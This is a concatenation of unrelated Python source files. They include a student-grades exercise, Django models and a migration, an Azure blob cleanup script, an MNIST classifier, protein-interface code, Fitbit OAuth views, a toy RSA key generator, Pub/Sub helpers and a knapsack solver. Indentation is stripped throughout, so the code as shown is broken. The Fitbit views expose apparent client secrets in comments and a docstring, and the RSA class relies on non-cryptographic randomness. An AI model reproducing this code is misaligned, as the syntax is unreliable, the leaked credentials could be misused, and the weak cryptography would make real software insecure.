linguistics_grades = []
psychology_grades = []
# Can you write a loop that fills the above separate lists from the students list of dictionaries?
for student in students:
first_names.append(student['first_name'])
last_names.append(student['last_name'])
addresses.append(student['address'])
maths_grades.append(student['maths'])
linguistics_grades.append(student['linguistics'])
psychology_grades.append(student['psychology'])
# Now, can you turn it into a pandas dataframe?
import pandas as pd # noqa: E402
students_df = pd.DataFrame(students)
print(students_df)
# What if you wanted to create a 3x100 numpy array of all the grades? (excluding other information)
import numpy as np # noqa: E402
grades = np.array([maths_grades, linguistics_grades, psychology_grades])
print(grades)
# Now, try to do the following for all four data structures:
# (list of dictionaries, separate lists, dataframe, array)
# Don't spend more than 20 minutes on any of these!
# Thinking about the solution is more important than programming it.
# 1. Get all the information belonging to the 20th student
print(students[19]) # List of dictionaries
print(first_names[19], last_names[19], addresses[19], maths_grades[19], linguistics_grades[19], psychology_grades[19]) # Separate lists
print(students_df.iloc[19]) # Dataframe
print(grades[:, 19]) # Array
# 2. Find the student with the highest linguistics grade
# List of dictionaries
highest = 0
highest_student = None
for student in students:
if student['linguistics'] > highest:
highest = student['linguistics']
highest_student = student
print(highest_student)
# Separate lists
highest = max(linguistics_grades)
highest_index = linguistics_grades.index(highest)
print(first_names[highest_index], last_names[highest_index], linguistics_grades[highest_index])
# Dataframe
highest_index = students_df['linguistics'].argmax()
print(students_df.iloc[highest_index])
# Array
highest_index = grades[1, :].argmax()
print(grades[:, highest_index]) # This will only print the grades of the student with the highest linguistics grade
# 3. Calculate the average grade per student; (maths + linguistics + psychology) / 3
# List of dictionaries
for student in students:
student['average'] = (student['maths'] + student['linguistics'] + student['psychology']) / 3
print(students[0]) # We only print the first student to check, to not clutter up the output too much
# Separate lists
average_grades = []
for i in range(len(linguistics_grades)):
average_grades.append((maths_grades[i] + linguistics_grades[i] + psychology_grades[i]) / 3)
print(average_grades[0])
# Dataframe
students_df['average'] = (students_df['maths'] + students_df['linguistics'] + students_df['psychology']) / 3
print(students_df.iloc[0])
# Array
averages = grades.mean(axis=0)
print(averages[0])
|
num = int(input())
nby2 = int(num/2)
l = []
for i in range(nby2,num):
s = i+sum(map(int,list(str(i))))
if s == num:
print(1)
print(i)
break
else:
print(0)
|
from django.db import models
class Radio(models.Model):
radio_id = models.AutoField(primary_key=True)
radio_name = models.CharField(max_length=100)
radio_description = models.TextField(blank=True, null=True)
class meta:
app_label = 'playlist'
def __str__(self):
return f'{self.radio_name}'
|
from django.db import models, migrations
APPLICATIONS = [
("admin", "modoboa_admin"),
("amavis", "modoboa_amavis"),
("limits", "modoboa_admin_limits"),
("postfix_autoreply", "modoboa_postfix_autoreply"),
("postfix_relay_domains", "modoboa_admin_relaydomains"),
("radicale", "modoboa_radicale"),
("stats", "modoboa_stats"),
("sievefilters", "modoboa_sievefilters"),
("webmail", "modoboa_webmail"),
]
def rename_app_parameters(app, model):
"""Rename all parameters for a given app."""
qset = model.objects.filter(name__startswith=app[0])
for param in qset:
param.name = param.name.replace(
"{}.".format(app[0]), "{}.".format(app[1])
)
param.save()
def rename_parameters(apps, schema_editor):
"""Rename old parameters."""
Parameter = apps.get_model("lib", "Parameter")
UserParameter = apps.get_model("lib", "UserParameter")
for app in APPLICATIONS:
rename_app_parameters(app, Parameter)
rename_app_parameters(app, UserParameter)
class Migration(migrations.Migration):
dependencies = [
('lib', '0001_initial'),
]
operations = [
migrations.RunPython(rename_parameters)
]
|
import os, uuid, re
from datetime import datetime, timedelta
from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient
connect_str = ""
#param of how old data we want to delete
date_from_delete = datetime.today() + timedelta(days = -180)
print(date_from_delete)
#looping thru folders and deleting the ones that are older than date_from_delete
try:
blob_service_client = BlobServiceClient.from_connection_string(connect_str)
container_client = ContainerClient.from_connection_string(
connect_str, container_name="datalake")
my_blobs = container_client.list_blobs()
for b in my_blobs:
if b.name.startswith('data/date='):
if datetime.strptime(b.name[10:20], '%Y-%m-%d').date() <= date_from_delete.date():
container_client.delete_blob(b.name)
except Exception as ex:
print('Exception:')
print(ex)
|
from yabadaba import databasemanager
from .IprPyDatabase import IprPyDatabase
# Extend the yabadaba CDCSDatabase to include IprPyDatabase operations
class CDCSDatabase(databasemanager.get_class('cdcs'), IprPyDatabase):
pass |
#-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: Stephanie
#
# Created: 08/03/2015
# Copyright: (c) Stephanie 2015
# Licence: <your licence>
#-------------------------------------------------------------------------------
from sklearn import preprocessing
from sklearn.datasets import load_svmlight_file
from sklearn import linear_model, metrics
from sklearn.naive_bayes import GaussianNB
import pdb
def preprocess(X):
'''Preprocess'''
scaler = preprocessing.StandardScaler()
norm = preprocessing.Normalizer()
modX = scaler.fit_transform(X)
modX = norm.fit_transform(modX)
return modX
def GNB(X, y):
'''Training'''
gnb = GaussianNB()
clf = gnb.fit(X, y)
return clf
def SVM(X, y):
'''Train'''
svm = linear_model.SGDClassifier(loss = 'log')
clf = svm.fit(X, y)
return clf
def test(model, X_test, y_test):
#prediction
# pred = model.predict(X_test)
# print("mislabeled %d out of %d total" %((y_test != pred).sum(), X_test.shape[0]))
# #score
# print model.score(X_test, y_test)*100, "%"
print metrics.classification_report(y_test, model.predict(X_test))
return
def main():
''' Get Data '''
x_train, y_train = load_svmlight_file('mnist')
x_train = x_train.toarray()
x_test, y_test = load_svmlight_file('mnist.t')
x_test = x_test.toarray()
std_scale = preprocessing.StandardScaler().fit(x_train)
x_train = std_scale.transform(x_train)
x_test = std_scale.transform(x_test)
''' Preprocess '''
proc_x_train = preprocess(x_train)
''' Train Model '''
model_SVM = SVM(proc_x_train, y_train)
''' Test Model '''
print "SVM accuracy on training data:"
test(model_SVM, x_train, y_train)
print "SVM accuracy on testing data:"
test(model_SVM, x_test, y_test)
return
if __name__ == '__main__':
main() |
import numpy as np
import itertools
import warnings
from .pdb2sqlcore import pdb2sql
class interface(pdb2sql):
def __init__(self, pdb, **kwargs):
"""Create an independent SQL database for interface object.
Args:
pdb(str, list, ndarray, pdb2sql): pdb file or data, or pdb2sql object.
If pdb2sql object is used, all changes in the database of pdb2sql
object before initializing the interface instance will be used in the
new sql database of the interface instance; afterwards, two databses
will be independent from each other.
Examples:
>>> from pdb2sql import pdb2sql
>>> from pdb2sql import interface
>>> # use pdb2sql object as input
>>> pdb_db = pdb2sql('3CRO.pdb')
>>> interface_db1 = interface(pdb_db)
>>> # use pdb file as input
>>> interface_db2 = interface('3CRO.pdb')
"""
if isinstance(pdb, pdb2sql):
pdb._commit()
pdb = pdb.sql2pdb()
super().__init__(pdb, **kwargs)
def __repr__(self):
return f'{self.__module__}.{self.__class__.__name__} object'
##########################################################################
#
# get the contact atoms
#
##########################################################################
def get_contact_atoms(
self,
cutoff=8.5,
allchains=False,
chain1='A',
chain2='B',
extend_to_residue=False,
only_backbone_atoms=False,
excludeH=False,
return_contact_pairs=False):
"""Get rowIDs of contact atoms.
Args:
cutoff (float): distance cutoff for calculating contact.
Defaults to 8.5.
allchains (bool): calculate contacts for all chains or not.
Defaults to False.
chain1 (str): first chain ID. Defaults to 'A'.
Used when 'allchains' is False.
chain2 (str): second chain ID. Defaults to 'B'.
Used when 'allchains' is False.
extend_to_residue (bool): get all atoms of the residues containing
at least one contact atom. Defaults to False.
only_backbone_atoms (bool): only use backbone atoms to
calculate contact or not. Defaults to False.
excludeH (bool): Exculde hydrogen atoms for contact
calculation or not. Defaults to False.
return_contact_pairs (bool): if return atomic contact pairs
or not. Defaults to False.
Returns:
dict: rowID of contact atoms or rowID of contact atom pairs
"""
if allchains:
chainIDs = self.get_chains()
else:
chainIDs = [chain1, chain2]
chains = self.get_chains()
for c in chainIDs:
if c not in chains:
raise ValueError(
'chain %s not found in the structure' % c)
xyz = dict()
index = dict()
resName = dict()
atName = dict()
for chain in chainIDs:
data = np.array(
self.get('x,y,z,rowID,resName,name', chainID=chain))
xyz[chain] = data[:, :3].astype(float)
index[chain] = data[:, 3].astype(int)
resName[chain] = data[:, -2]
atName[chain] = data[:, -1]
# loop through the first chain
# TODO : loop through the smallest chain instead ...
#index_contact_1,index_contact_2 = [],[]
#index_contact_pairs = {}
index_contact = dict()
index_contact_pairs = dict()
for chain1, chain2 in itertools.combinations(chainIDs, 2):
xyz1 = xyz[chain1]
xyz2 = xyz[chain2]
atName1 = atName[chain1]
atName2 = atName[chain2]
if chain1 not in index_contact:
index_contact[chain1] = []
if chain2 not in index_contact:
index_contact[chain2] = []
for i, x0 in enumerate(xyz1):
# compute the contact atoms
contacts = np.where(
np.sqrt(np.sum((xyz2 - x0)**2, 1)) <= cutoff)[0]
# exclude the H if required
if excludeH and atName1[i][0] == 'H':
continue
if len(contacts) > 0 and any(
[not only_backbone_atoms, atName1[i] in self.backbone_atoms]):
pairs = [
index[chain2][k] for k in contacts if any(
[
atName2[k] in self.backbone_atoms,
not only_backbone_atoms]) and not (
excludeH and atName2[k][0] == 'H')]
if len(pairs) > 0:
index_contact_pairs[index[chain1][i]] = pairs
index_contact[chain1] += [index[chain1][i]]
index_contact[chain2] += pairs
# if no atoms were found
if len(index_contact_pairs) == 0:
warnings.warn('No contact atoms detected in pdb2sql')
# get uniques
for chain in chainIDs:
index_contact[chain] = sorted(set(index_contact[chain]))
# extend the list to entire residue
if extend_to_residue:
for chain in chainIDs:
index_contact[chain] = self._extend_contact_to_residue(
index_contact[chain], only_backbone_atoms)
# not sure that's the best way of dealing with that
# TODO split to two functions get_contact_atoms and
# get_contact_atom_pairs
if return_contact_pairs:
return index_contact_pairs
else:
return index_contact
# extend the contact atoms to the residue
def _extend_contact_to_residue(self, index1, only_backbone_atoms):
# extract the data
dataA = self.get('chainID,resName,resSeq', rowID=index1)
#dataB = self.get('chainID,resName,resSeq',rowID=index2)
# create tuple cause we want to hash through it
dataA = list(map(lambda x: tuple(x), dataA))
#dataB = list(map(lambda x: tuple(x),dataB))
# extract uniques
resA = list(set(dataA))
#resB = list(set(dataB))
# init the list
index_contact_A = []
# contact of chain A
for resdata in resA:
chainID, resName, resSeq = resdata
if only_backbone_atoms:
index = self.get(
'rowID',
chainID=chainID,
resName=resName,
resSeq=resSeq)
name = self.get(
'name',
chainID=chainID,
resName=resName,
resSeq=resSeq)
index_contact_A += [ind for ind,
n in zip(index,
name) if n in self.backbone_atoms]
else:
index_contact_A += self.get('rowID',
chainID=chainID,
resName=resName,
resSeq=resSeq)
# make sure that we don't have double (maybe optional)
index_contact_A = sorted(set(index_contact_A))
return index_contact_A
# get the contact residue
def get_contact_residues(
self,
cutoff=8.5,
allchains=False,
chain1='A',
chain2='B',
excludeH=False,
only_backbone_atoms=False,
return_contact_pairs=False):
"""Get contact residues represented with (chain,resSeq, resname).
Args:
cutoff (float): distance cutoff for contact calculation
Defaults to 8.5.
allchains (bool): calculate contacts for all chains or not.
Defaults to False.
chain1 (str): first chain ID. Defaults to 'A'.
chain2 (str): second chain ID. Defaults to 'B'.
excludeH (bool): Exculde hydrogen atoms for contact
calculation or not. Defaults to False.
only_backbone_atoms (bool): only use backbone atoms to
calculate contact or not. Defaults to False.
return_contact_pairs (bool): if return residue contact pairs
or not. Defaults to False.
Returns:
dict: (chain,resSeq,resName) of contact residues or
contact residue pairs.
"""
# TODO split this func to two functions
# TODO get_contact_residues and get_contact_residue_pairs
# get the contact atoms
if return_contact_pairs:
# declare the dict
residue_contact_pairs = {}
# get the contact atom pairs
atom_pairs = self.get_contact_atoms(
cutoff=cutoff,
allchains=allchains,
chain1=chain1,
chain2=chain2,
only_backbone_atoms=only_backbone_atoms,
excludeH=excludeH,
return_contact_pairs=True)
# loop over the atom pair dict
for iat1, atoms2 in atom_pairs.items():
# get the res info of the current atom
data1 = tuple(
self.get(
'chainID,resSeq,resName',
rowID=[iat1])[0])
# create a new entry in the dict if necessary
if data1 not in residue_contact_pairs:
residue_contact_pairs[data1] = set()
# get the res info of the atom in the other chain
data2 = self.get(
'chainID,resSeq,resName', rowID=atoms2)
# store that in the dict without double
for resData in data2:
residue_contact_pairs[data1].add(tuple(resData))
for resData in residue_contact_pairs.keys():
residue_contact_pairs[resData] = sorted(
residue_contact_pairs[resData])
return residue_contact_pairs
else:
# get the contact atoms
contact_atoms = self.get_contact_atoms(
cutoff=cutoff,
allchains=allchains,
chain1=chain1,
chain2=chain2,
excludeH=excludeH,
only_backbone_atoms=only_backbone_atoms,
return_contact_pairs=False)
# get the residue info
data = dict()
residue_contact = dict()
for chain in contact_atoms.keys():
data[chain] = self.get(
'chainID,resSeq,resName',
rowID=contact_atoms[chain])
residue_contact[chain] = sorted(
set([tuple(resData) for resData in data[chain]]))
return residue_contact
|
import json
import base64
import requests
import webbrowser
import pprint
from datetime import datetime, timedelta , date, time
from decimal import Decimal, ROUND_HALF_UP
import ast
import logging
from django.db.models import Q
from django.shortcuts import render
from django.core.mail import EmailMessage
from django.shortcuts import redirect
from django.http import HttpResponse
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import generics
from rest_framework import status
from rest_framework.permissions import IsAuthenticated
from .tasks import store_fitbit_data
from rauth import OAuth2Service, OAuth2Session
from .models import FitbitConnectToken,\
UserFitbitDataSleep,\
UserFitbitDataHeartRate,\
UserFitbitDataActivities,\
UserFitbitDataSteps,\
FitbitNotifications,\
UserAppTokens,\
UserAppSubscriptionToken
from hrr.models import (AaCalculations,
TimeHeartZones,
AaWorkoutCalculations,
AA)
from fitbit.fitbit_push import store_data,session_fitbit,get_client_id_secret,include_resting_hr
import quicklook.calculations.converter
from quicklook.calculations.converter.fitbit_to_garmin_converter import fitbit_to_garmin_activities
from django.conf import settings
# Create your views here.
redirect_uri = settings.FITBIT_REDIRECT_URL
# def get_client_id_secret(user):
# '''
# This function get the client id and client secret from databse for respective use
# if not then provide jvb app client id,secret
# '''
# try:
# user_app_tokens = UserAppTokens.objects.get(user=user)
# client_id = user_app_tokens.user_client_id
# client_secret = user_app_tokens.user_client_secret
# except:
# client_id = settings.FITBIT_CONSUMER_ID
# client_secret = settings.FITBIT_CONSUMER_SECRET
# return client_id,client_secret
class FitbitPush(APIView):
'''
This view will receive fitbit push notification data and
call the signal to store that data in database
'''
def post(self, request, format="json"):
data = request.data
store_fitbit_data.delay(data)
return Response(status=status.HTTP_204_NO_CONTENT)
def get(self, request, format="json"):
# verify_codes = ['116ac5efa95d30cb8f4d4118a3a6845e4b16220c8b3839bac4002db982804c3a',
# '4d48c7d06f18f34bb9479af97d4dd82732885d3adbeda22c1ce79c559189900c',
# '5ab5902e4e30d983e32f0927b2e087824b923759f482798a5cb242b59c122afa',
# 'c48e07b496216e1016bf5029a6e6089e238d1dcf135a5296607c3a8377308a53',
# 'fde3ef2d376adfaa762560aa942fa9e07a96a1a1e5e8e3c711eb1b26df4dc919',
# '6c1d1f97ebe6fd810652d2d655bd8b0cc56f66b64473cab2f2597f03293a8a4e']
all_sub_tokens = UserAppSubscriptionToken.objects.all()
verify_codes = []
for single_token in all_sub_tokens:
verify_codes.append(single_token.user_subscription_token)
verification_code = request.query_params
verify_code = verification_code.get('verify','')
if verify_code in verify_codes:
return Response(status = status.HTTP_204_NO_CONTENT)
else:
return Response(status = status.HTTP_404_NOT_FOUND)
def refresh_token(user):
'''
This function updates the expired tokens in database
Return: refresh token and access token
'''
client_id,client_secret = get_client_id_secret(user)
# client_id='22CN2D'
# client_secret='e83ed7f9b5c3d49c89d6bdd0b4671b2b'
access_token_url='https://api.fitbit.com/oauth2/token'
token = FitbitConnectToken.objects.get(user = user)
refresh_token_acc = token.refresh_token
client_id_secret = '{}:{}'.format(client_id,client_secret).encode()
headers = {
'Authorization':'Basic'+' '+base64.b64encode(client_id_secret).decode('utf-8'),
'Content-Type':'application/x-www-form-urlencoded'
}
data = {
'grant_type' : 'refresh_token',
'refresh_token': refresh_token_acc,
}
request_data = requests.post(access_token_url,headers=headers,data=data)
request_data_json = request_data.json()
print(pprint.pprint(request_data_json))
token_object = ''
try:
token_object = FitbitConnectToken.objects.get(user=user)
token_object.refresh_token=request_data_json['refresh_token']
token_object.access_token=request_data_json['access_token']
token_object.save()
fetching_data_fitbit(request)
except:
logging.exception("message")
if token_object:
return (request_data_json['refresh_token'],request_data_json['access_token'])
def fitbit_user_subscriptions(user):
service = session_fitbit(user)
tokens = FitbitConnectToken.objects.get(user = user)
fibtbit_user_id = tokens.user_id_fitbit
access_token = tokens.access_token
session = service.get_session(access_token)
session.post("https://api.fitbit.com/1/user/-/apiSubscriptions/{}.json".format(
fibtbit_user_id))
session.post(
"https://api.fitbit.com/1/user/-/activities/apiSubscriptions/{}-activities.json".format(
fibtbit_user_id))
session.post(
"https://api.fitbit.com/1/user/-/foods/apiSubscriptions/{}-foods.json".format(
fibtbit_user_id))
session.post(
"https://api.fitbit.com/1/user/-/sleep/apiSubscriptions/{}-sleep.json".format(
fibtbit_user_id))
session.post(
"https://api.fitbit.com/1/user/-/body/apiSubscriptions/{}-body.json".format(
fibtbit_user_id))
return None
# def include_resting_hr(heartrate_fitbit_intraday,heartrate_fitbit):
# try:
# heartrate_fitbit_intraday_json = ''
# heartrate_fitbit_json = ''
# if heartrate_fitbit_intraday:
# heartrate_fitbit_intraday_json = heartrate_fitbit_intraday.json()
# if heartrate_fitbit:
# heartrate_fitbit_json = heartrate_fitbit.json()
# if heartrate_fitbit_intraday_json and heartrate_fitbit_json:
# if heartrate_fitbit_json['activities-heart'][0]["value"].get("restingHeartRate"):
# heartrate_fitbit_intraday_json['activities-heart'][0]["restingHeartRate"] = heartrate_fitbit_json['activities-heart'][0]["value"].get("restingHeartRate")
# return heartrate_fitbit_intraday_json
# elif heartrate_fitbit_json:
# return heartrate_fitbit_json
# else:
# return {}
# except:
# return {}
def api_fitbit(session,date_fitbit):
'''
Takes session and start date then call the fitbit api,return the fitbit api
'''
heartrate_fitbit_intraday = ''
heartrate_fitbit = ''
sleep_fitbit = session.get("https://api.fitbit.com/1.2/user/-/sleep/date/{}.json".format(date_fitbit))
activity_fitbit = session.get(
"https://api.fitbit.com/1/user/-/activities/list.json?afterDate={}&sort=asc&limit=10&offset=0".format(
date_fitbit))
try:
heartrate_fitbit_intraday = session.get(
"https://api.fitbit.com/1/user/-/activities/heart/date/{}/1d/1sec/time/00:00/23:59.json".format(date_fitbit))
except:
pass
heartrate_fitbit_normal = session.get(
"https://api.fitbit.com/1/user/-/activities/heart/date/{}/1d.json".format(date_fitbit))
heartrate_fitbit = include_resting_hr(heartrate_fitbit_intraday,heartrate_fitbit_normal)
try:
steps_fitbit = session.get(
"https://api.fitbit.com/1/user/-/activities/steps/date/{}/1d/1min/time/00:00/23:59.json".format(date_fitbit))
except:
steps_fitbit = session.get(
"https://api.fitbit.com/1/user/-/activities/steps/date/{}/1d.json".format(date_fitbit))
return(sleep_fitbit,activity_fitbit,heartrate_fitbit,steps_fitbit)
def request_token_fitbit(request):
client_id,client_secret = get_client_id_secret(request.user)
service = OAuth2Service(
client_id=client_id,
client_secret=client_secret,
access_token_url='https://api.fitbit.com/oauth2/token',
authorize_url='https://www.fitbit.com/oauth2/authorize',
base_url='https://fitbit.com/api')
params = {
'redirect_uri':redirect_uri,
'response_type':'code',
'scope':' '.join(['activity','nutrition','heartrate','location',
'profile','settings','sleep','social','weight'])
}
url = service.get_authorize_url(**params)
return redirect(url)
def receive_token_fitbit(request):
client_id,client_secret = get_client_id_secret(request.user)
# client_id='22CN2D'
# client_secret='e83ed7f9b5c3d49c89d6bdd0b4671b2b'
access_token_url='https://api.fitbit.com/oauth2/token'
authorize_url='https://www.fitbit.com/oauth2/authorize'
base_url='https://fitbit.com/api'
authorization_code = request.GET.get('code',None)
if authorization_code:
client_id_secret = '{}:{}'.format(client_id,client_secret).encode()
headers = {
'Authorization':'Basic'+' '+base64.b64encode(client_id_secret).decode('utf-8'),
'Content-Type':'application/x-www-form-urlencoded'
}
data = {
'clientId':client_id,
'grant_type':'authorization_code',
'redirect_uri':redirect_uri,
'code':authorization_code
}
r = requests.post(access_token_url,headers=headers,data=data)
a = r.json()
# print(print(a))
try:
token = FitbitConnectToken.objects.get(user = request.user)
#print(token)
if token:
setattr(token, "refresh_token", a['refresh_token'])
setattr(token, "access_token", a['access_token'])
setattr(token, "user_id_fitbit", a['user_id'])
token.save()
except FitbitConnectToken.DoesNotExist:
FitbitConnectToken.objects.create(
user=request.user,refresh_token=a['refresh_token'],
access_token=a['access_token'],user_id_fitbit=a['user_id'])
fitbit_user_subscriptions(request.user)
return redirect('/service_connect_fitbit')
def fetching_data_fitbit(request):
start_date_str = request.GET.get('start_date',None)
start_date = datetime.strptime(start_date_str, "%Y-%m-%d").date()
service = session_fitbit(request.user)
tokens = FitbitConnectToken.objects.get(user = request.user)
access_token = tokens.access_token
session = service.get_session(access_token)
date_fitbit = start_date
sleep_fitbit,activity_fitbit,heartrate_fitbit,steps_fitbit = api_fitbit(session,date_fitbit)
# checking status
statuscode = sleep_fitbit.status_code
#converting str to dict
sleep_fitbit = sleep_fitbit.json()
activity_fitbit = activity_fitbit.json()
heartrate_fitbit = heartrate_fitbit
steps_fitbit = steps_fitbit.json()
if statuscode == 401: # if status 401 means fitbit tokens are expired below does generate tokens
if sleep_fitbit['errors'][0]['errorType'] == 'expired_token':
user = request.user
refresh_token(user)
fitbit_all_data = {}
fitbit_all_data['sleep_fitbit'] = sleep_fitbit
fitbit_all_data['activity_fitbit'] = activity_fitbit
fitbit_all_data['heartrate_fitbit'] = heartrate_fitbit
fitbit_all_data['steps_fitbit'] = steps_fitbit
store_data(fitbit_all_data,request.user,start_date_str,create_notification=None)
fitbit_data = {"sleep_fitbit":sleep_fitbit,
"activity_fitbit":activity_fitbit,
"heartrate_fitbit":heartrate_fitbit,
"steps_fitbit":steps_fitbit}
data = json.dumps(fitbit_data)
return HttpResponse(data,content_type='application/json')
# def refresh_token_fitbit(request):
# client_id='22CN2D'
# client_secret='e83ed7f9b5c3d49c89d6bdd0b4671b2b'
# access_token_url='https://api.fitbit.com/oauth2/token'
# token = FitbitConnectToken.objects.get(user = request.user)
# refresh_token_acc = token.refresh_token
# client_id_secret = '{}:{}'.format(client_id,client_secret).encode()
# headers = {
# 'Authorization':'Basic'+' '+base64.b64encode(client_id_secret).decode('utf-8'),
# 'Content-Type':'application/x-www-form-urlencoded'
# }
# data = {
# 'grant_type' : 'refresh_token',
# 'refresh_token': refresh_token_acc,
# }
# r = requests.post(access_token_url,headers=headers,data=data)
# a = r.json()
#print(type(a))
'''
jvb
client id ---- 22CN2D
client secret ---- e83ed7f9b5c3d49c89d6bdd0b4671b2b
redirect url ---- https://app.jvbwellness.com/callbacks/fitbit
test
client id ---- 22CN2D
client secret ---- 94d717c6ec36c270ed59cc8b5564166f
redirect url ---- http://127.0.0.1:8000/callbacks/fitbit
'''
# def call_push_api():
# '''
# This function takes the notificatin messages which are stored in last 10 min
# creates a session
# '''
# print("Startes for checking notifications in database")
# time = datetime.now() - timedelta(minutes=15)
# updated_data = FitbitNotifications.objects.filter(Q(created_at__gte=time))
# if updated_data:
# service = session_fitbit()
# tokens = FitbitConnectToken.objects.get(user = request.user)
# access_token = tokens.access_token
# session = service.get_session(access_token)
# for i,k in enumerate(updated_data):
# k = ast.literal_eval(k.data_notification)
# date = k[i]['date']
# user_id = k[i]['ownerId']
# data_type = k[i]['collectionType']
# try:
# user = FitbitConnectToken.objects.get(user_id_fitbit=user_id).user
# except FitbitConnectToken.DoesNotExist as e:
# user = None
# call_api(date,user_id,data_type,user,session)
# return HttpResponse('Final return')
# return None
# def call_api(date,user_id,data_type,user,session):
# '''
# This function call push notification messages and then store in to the
# database
# Args: date(date which comes in push message)
# user_id
# data_type(type of data)
# user(user instance)
# session(created sesssion)
# Return: returns nothing
# '''
# if data_type == 'sleep':
# sleep_fitbit = session.get(
# "https://api.fitbit.com/1.2/user/{}/{}/date/{}.json".format(
# user_id,data_type,date))
# sleep_fitbit = sleep_fitbit.json()
# store_data(sleep_fitbit,user,date,data_type='sleep_fitbit')
# elif data_type == 'activities':
# activity_fitbit = session.get(
# "https://api.fitbit.com/1/user/{}/activities/list.json?afterDate={}&sort=asc&limit=10&offset=0".format(
# user_id,date))
# heartrate_fitbit = session.get(
# "https://api.fitbit.com/1/user/{}/activities/heart/date/{}/1d.json".format(
# user_id,date_fitbit))
# steps_fitbit = session.get(
# "https://api.fitbit.com/1/user/{}/activities/steps/date/{}/1d.json".format(
# user_id,date_fitbit))
# if activity_fitbit:
# activity_fitbit = activity_fitbit.json()
# store_data(activity_fitbit,user,date,data_type)
# if heartrate_fitbit:
# heartrate_fitbit = heartrate_fitbit.json()
# store_data(heartrate_fitbit,user,date,data_type="heartrate_fitbit")
# if steps_fitbit:
# steps_fitbit = steps_fitbit.json()
# store_data(steps_fitbit,user,date,data_type="steps_fitbit")
# return None
|
from random import *
from math import *
from os import urandom
class Key:
def __init__(self, bitSize):
self.__bitSize = bitSize
def __isPrime(self, n):
if n==2 or n==3: return True
if n%2==0 or n<2: return False
for i in range(3,int(n**0.5)+1,2): # only odd numbers
if n%i==0:
return False
return True
def __randBitNumber(self):
return randint(2**(self.__bitSize-1)+1, 2**self.__bitSize)
def __getPrime(self):
num = self.__randBitNumber()
while not self.__isPrime(num):
num = self.__randBitNumber()
return num
def __isRelativePrime(self, a, b):
m = a*b
while a != 0 and b != 0:
if a > b:
a %= b
else:
b %= a
lcm = m // (a+b)
if lcm == m: return True
else: return False
def __getRealativePrime(self, a):
for i in range(3, int(a**1/2)):
if self.__isRelativePrime(i, a): return i
raise Exception("Не удалось найти относительно простое число.")
def getD(self, a, b):
if b == 0:
return a, 1, 0
else:
d, x1, y1 = self.getD(b, a%b)
x = y1
y = x1-(a//b)*y1
return d, x, y
def __test(self, keys):
test = 2
encrypt = test**keys[0][0]%keys[0][1]
decrypt = encrypt**keys[1][0]%keys[1][1]
return test == decrypt
def getKeys(self):
testFlag = False
while not testFlag:
p = self.__getPrime()
# p = 3557
q = self.__getPrime()
# q = 2579
n = p * q
eler = (p-1) * (q-1)
e = self.__getRealativePrime(eler)
d = self.getD(e, eler)[1]
if d < 0:
d = d+abs(d)*e+1
testFlag = self.__test([[e, n], [d, n]])
#open key, close key
return [[e, n], [d, n]]
|
import os
import json
import base64
from flask import jsonify
from google.cloud import pubsub_v1
def publish_to_pubsub(topic, data, message=None, project_id=None):
"""
Send a message with a data payload to pub/sub
"""
project_id = project_id or os.environ.get('PROJECT_ID')
publisher = pubsub_v1.PublisherClient()
topic_name = f'projects/{project_id}/topics/{topic}'
if message is not None:
future = publisher.publish(topic_name, json.dumps(data).encode("utf-8"), message=message.encode("utf-8"))
else:
future = publisher.publish(topic_name, json.dumps(data).encode("utf-8"))
result = str(future.result())
print({"published_message_id", result})
return result
def unpack_event(event):
"""
Get the 'message' and 'data' from a pubsub event
"""
data = json.loads(base64.b64decode(event['data']).decode('utf-8'))
attributes = event['attributes']
return data, attributes
def request_to_pubsub(request, topic=None, validation_func=None):
"""
Responds to a request to publish
Args:
request (flask.Request): HTTP request object with JSON payload. Payload should have the following schema:
{
"message": "blah", # Will be used to ID the message upstream source in pubsub
"data": {} # Will be passed as a JSON payload to the target Topic as an argument called data
}
topic: Pub/Sub topic to add the message to.
validation_func: Function to validate a JSON payload and throw a BadRequest exception if it doesn't validate.
Returns:
JSON message in response.
"""
payload = request.get_json(force=True)
print({"payload", payload})
topic = topic or payload.get('topic') or os.environ.get('TOPIC_NAME')
if topic is None:
raise EnvironmentError('topic must be specified in the parameters or request as "topic" '
'or environment as TOPIC_NAME')
if validation_func is not None and callable(validation_func) is True:
validation_func(payload=payload)
result = publish_to_pubsub(topic=topic, message=f"request forwarded from {request.full_path}", data=payload)
return jsonify({'message_id': result})
|
import pandas as pd
def load_comparisonXL(method, evaluate="train", dropna=True):
"""Load comparison table."""
if evaluate == "test":
e = "['Test']"
elif evaluate == "in bag":
e = "['In Bag']"
elif evaluate == "out of bag":
e = "['Out of Bag']"
else:
e = "['Train']"
# Import methods
table = []
for i in method:
table.append(pd.read_excel(i + ".xlsx"))
# Concatenate table
df = pd.DataFrame()
for i in range(len(table)):
df = pd.concat([df, table[i].loc[table[i]['evaluate'] == e].T.squeeze()], axis=1, sort=False)
df = df.T.drop(columns="evaluate")
# Remove [ ] from string
for i in range(len(df)):
for j in range(len(df.T)):
if type(df.iloc[i, j]) is str:
df.iloc[i, j] = df.iloc[i, j][2: -2]
# Reset index and add methods column
method_name = []
for i in range(len(method)):
name_i = method[i].rsplit('/', 1)[1]
method_name.append(name_i)
df = df.reset_index()
df = pd.concat([pd.Series(method_name, name="method"), df], axis=1, sort=False)
df = df.drop("index", 1)
#df = df.set_index("method")
# drop columns with just nans
if dropna is True:
df = df.dropna(axis=1, how='all')
return df
|
def UKnapsack (N , s) :
global dp , wt, val
for i in range (N + 1) :
for j in range (s + 1) :
if (i == 0) :
dp[i][j] = 0
elif (j == 0) :
dp[i][j] = 0
else :
if (wt[i-1] > s) :
dp[i][j] = dp[i-1][j]
else :
dp[i][j] = max(dp[i-1][j],val[i-1]+dp[i][j-wt[i-1]])
return dp[-1][-1]
N = int (input("Enter the number of inputs : "))
wt = list(map(int , input().split()))
val = list(map(int , input().split()))
max_cap = int(input("Enter max cap : "))
dp = [[0 for i in range(max_cap + 1)]for j in range(N + 1)]
print(UKnapsack(N,max_cap))
|
def reverse(string):
return string if len(string) == 1 else string[-1] + reverse(string[:-1])
|
text = "X-DSPAM-Confidence: 0.8475"
numbers1 = text.find("0")
numbers2 = text.find("5")
print(numbers2)
ftnumbers = float(text[numbers1:numbers2+1])
print(ftnumbers) |
#!/usr/bin/env python3
from hue import HueControlUtil as hue
from wemo import WemoControlUtil as wemo
from alexa import AlexaControlUtil as alexa
import time, os, sys, argparse
from datetime import datetime
class Recipe(object):
def __init__(self):
pass
